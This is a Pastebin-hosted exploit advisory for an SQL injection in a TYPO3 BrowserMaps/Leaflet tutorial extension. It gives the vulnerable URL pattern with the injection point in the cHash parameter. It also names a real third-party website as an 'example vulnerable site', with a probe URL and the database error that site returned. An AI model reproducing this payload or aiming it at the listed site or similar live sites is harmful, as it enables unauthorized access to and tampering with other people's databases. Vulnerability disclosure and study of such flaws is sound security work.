Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##################################################################################
- # Exploit Title : Typo3 CMS BrowserMaps Leaflet Tutorial tx_browser_pi1 8.0.39 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/02/2019
- # Vendor Homepage : typo3-organiser.de ~ typo3.org
- # Software Download Links :
- extensions.typo3.org/extension/download/browser_tut_map_en/4.1.15/zip/
- extensions.typo3.org/extension/download/browser_tut_map_en/4.1.17/zip/
- extensions.typo3.org/extension/download/browser_tut_map_en/4.1.23/zip/
- extensions.typo3.org/extension/download/browser_tut_map_en/4.1.24/zip/
- extensions.typo3.org/extension/download/browser_tut_map_en/4.4.0/zip/
- extensions.typo3.org/extension/download/browser_tut_map_en/4.6.2/zip/
- extensions.typo3.org/extension/download/browser_tut_leaflet_en/7.0.10/zip/
- extensions.typo3.org/extension/download/browser_tut_leaflet_en/7.0.2/zip/
- extensions.typo3.org/extension/download/browser_tut_leaflet_en/7.0.1/zip/
- extensions.typo3.org/extension/download/browser_tut_leaflet_en/8.0.39/zip/
- # Software Information Links : extensions.typo3.org/extension/browser_tut_map_en/
- extensions.typo3.org/extension/browser_tut_leaflet_en/
- # Software Version : TYPO3 works with (4.5.0 - 6.2.99)
- 7.0.1 - 7.0.2 - 7.0.10 - 8.0.39 and all previous versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ##################################################################################
- # Description about Software :
- ***************************
- Publish your data and points of interest (POI) with GoogleMaps and OpenStreetMap!
- Use Leaflet with your own database. Use Leaflet ready-to-use with the Organiser -
- TYPO3 for the lobbies and the organisers. Update the geocoding of any address.
- Configure Leaflet with the Constant Editor. Leaflet is a responsive mobile-friendly interactive map.
- ##################################################################################
- # Impact :
- ***********
- Typo3 BrowserMaps Leaflet Tutorial tx_browser_pi1 8.0.39 [ and other versions ]
- extension for TYPO3 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize
- user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ##################################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?id=[ID-NUMBER]&tx_browser_pi1%5BshowUid%5D=46&L=[ID-NUMBER]&cHash=[SQL Injection]
- ##################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] girloon.de/index.php?id=95&tx_browser_pi1%5BshowUid%5D=46&L=1&cHash=1%27
- ##################################################################################
- # Example SQL Database Error :
- ****************************
- caller
- TYPO3\CMS\Core\Database\DatabaseConnection::sql_query
- ERROR
- You have an error in your SQL syntax; check the manual that
- corresponds to your MySQL server version for the right syntax to use near '-1' at line 66
- lastBuiltQuery
- SELECT DISTINCT tx_carpet_domain_model_produkt.uid
- AS 'tx_carpet_domain_model_produkt.uid' FROM tx_carpet_domain_model_produkt
- LEFT JOIN tx_carpet_produkt_muster_mm AS tx_carpet_domain_model_
- produkt_mm_tx_carpet_domain_model_muster
- ON tx_carpet_domain_model_produkt.uid = tx_carpet_domain_
- model_produkt_mm_tx_carpet_domain_model_muster.uid_local
- ##################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ##################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement